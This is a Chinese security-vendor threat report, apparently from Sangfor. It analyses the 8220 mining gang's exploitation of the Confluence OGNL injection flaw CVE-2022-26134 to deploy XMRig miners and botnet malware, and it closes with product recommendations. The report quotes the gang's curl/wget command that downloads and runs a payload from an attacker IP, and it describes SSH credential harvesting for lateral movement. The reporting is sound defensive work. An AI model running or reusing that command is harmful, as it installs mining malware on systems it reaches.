事件概要
近日爆发的 Atlassian Confluence OGNL 注入命令执行漏洞(CVE-2022-26134)漏洞等级为严重,该漏洞CVSS3.1评分:9.8。攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 OGNL 表达式注入攻击,最终导致远程代码执行。
深信服深瞻情报实验室在监控该漏洞的在野利用中,发现多个黑产组织已经将其武器化,试图利用该漏洞进行入侵攻击,若攻击成功则会在用户网络中安装后门或挖矿病毒。
8220挖矿团伙率先利用漏洞发起攻击
“8220”是一个长期活跃并且擅长使用漏洞进行攻击并部署挖矿程序的黑产团伙,该团伙早期使用 Docker 镜像传播挖矿木马,后来逐步通过 Redis 和 Apache 等流行服务的各种 n-day 漏洞利用进行传播。该团伙最终会在受感染主机上下载并执行挖矿程序和Tsunami僵尸网络,并进一步获得持久性,尝试横向移动,以及痕迹清理。
8220 挖矿团伙暂时并未将此漏洞集成到恶意软件的横向模块,所以利用CVE-2022-26134攻击的目标对象主要为存在漏洞且对外网映射的Confluence服务器。
本次 8220 挖矿木马(Linux)使用CVE-2022-26134进行攻击的流程如下所示:
8220 挖矿团伙精心构造含有 CVE-2022-26134 漏洞利用的 HTTP 请求作为初始攻击,并使用 Java 执行功能执行命令,将恶意负载下载到受害者的机器上,本次 8220 的攻击特征如下:
curl -fsSL http://192.210.200.66:1234/xmss||wget -q -O - http://192.210.200.66:1234/xmss
该病毒(localgo 函数)会搜集用户 ssh 端口、用户列表、主机列表、登录密钥凭证,将其用于尝试登录其他机器(导致横向传播),以下载和安装http://$url/xms:
8220 病毒会进一步利用用户的服务器/主机进行非法挖矿,下载的矿机是利用最新版本的开源 XMRig 挖矿项目编译,版本编号为 6.17.0,挖矿程序的运行会耗尽受害系统资源:
矿工钱包地址如下:
在持续监控 8220 挖矿团伙过程中发现,该团伙在横向移动的模块中除了使用扫描工具masscan,还新增了 spirit 黑客工具,用于在内网进行资产扫描和入侵,下载的px中存储了爆破攻击的 16073 个弱密码。
总结
漏洞利用作为黑产发起攻击的重要手段,0day 或 Nday 漏洞已经成为恶意软件的常用套路,恶意软件为了更有效和广泛的传播,会在漏洞被披露的第一时间更新进武器库。Atlassian Confluence OGNL 注入命令执行漏洞利用攻击再次证明这一点,除了 8220挖矿木马,我们还捕获到 H2Miner、Mirai 等病毒也同样使用了此漏洞发起攻击,建议广大用户提高警惕,提前做好应对!
解决方案
【终端安全管理系统】已支持查杀拦截此次事件使用的病毒文件,请更新软件(如有定制请先咨询售后再更新版本)和病毒库至最新版本,及时查杀新威胁。
【深信服下一代防火墙AF】的安全防护规则更新至最新版本,接入深信服云平台,“云鉴” 服务即可轻松抵御此高危风险。
【深信服安全感知管理平台SIP】建议用户及时更新规则库,接入云图,并联动【深信服下一代防火墙AF】实现对高危风险的入侵防护。
【深信服安全托管服务MSS】以保障用户网络安全“持续有效”为目标,通过将用户安全设备接入安全运营中心,依托于XDR安全能力平台和MSSP安全服务平台实现有效协同的“人机共智”模式,围绕资产、脆弱性、威胁、事件四个要素为用户提供7*24H的安全运营服务,快速扩展持续有效的安全运营能力,保障可承诺的风险管控效果。
原文始发于微信公众号(深信服千里目安全实验室):进击的“8220”!深信服捕获8220挖矿团伙使用最新Confluence高危漏洞发起攻击
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论